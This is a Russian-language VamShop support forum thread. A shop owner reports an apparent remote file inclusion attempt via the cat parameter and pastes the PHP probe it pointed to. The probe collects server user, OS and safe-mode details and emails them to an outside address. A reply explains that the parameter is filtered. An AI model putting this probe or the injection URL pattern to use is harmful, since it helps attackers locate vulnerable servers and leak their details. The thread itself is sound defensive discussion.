Перейти к содержанию
Форум поддержки пользователей VamShop

Пробовали взломать или паранойя :)


Рекомендуемые сообщения

Не знаю в тот раздел или нет, если нужно перенесите в другой.

Похоже пробовали поискать уязвимости.

Случайно обнаружил онлайн посетителя с Последний URL = /index.php?cat=http://www.golfer******.co.th/newweb/undefild2.txt?

Конечно же я полез посмотреть чего там, в этом undefild2.txt :) А там вот что:


<?php
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$UNAME = @php_uname();
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "OFF"; }
else { $SafeMode = " $SafeMode "; }
$delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$dados=("<b>Produto</b> = " . $UNAME . "
<i>Seguran?a</i> = " . $SafeMode . "
http://" . $delet . "

Muito obrigado por comprar o hehe1 com: <u>delet</u>");
$email = "pacco.rabbanne@gmail.com";
$assunto = "CHEGOU VULLZZ";
$email1 = "pacco.rabbanne@gmail.com";
$headers = "From: <$email>rn";
$headers = "MIME-Version: 1.0rn";
$headers .= "Content-type: text/html; charset=iso-8859-1rn";
if(mail($email1,$assunto,$dados,$headers)){
echo "Isso, ja foi!";
exit();
}
else{
echo "N?o foi.";
exit();
}
?>
[/CODE]

Расскажите плиз мне что это такое и чего пытались выяснить? Можно от моего имени спамить или нет, верно?

Ссылка на сообщение
Поделиться на другие сайты

По идее, ничего страшного.

В браузере откройте эту ссылки, т.е. cat=....

Ничего не должно произойти, значения в cat фильтруются

Ссылка на сообщение
Поделиться на другие сайты

По идее, ничего страшного.

В браузере откройте эту ссылки, т.е. cat=....

Ничего не должно произойти, значения в cat фильтруются

Спасибо за быстрый ответ! Да, параметр cat фильтруется я уже проверил.

Написал вебмастеру сайта где лежит этот файл, что еще раз и абуза хостеру ;)

Ссылка на сообщение
Поделиться на другие сайты
×
×
  • Создать...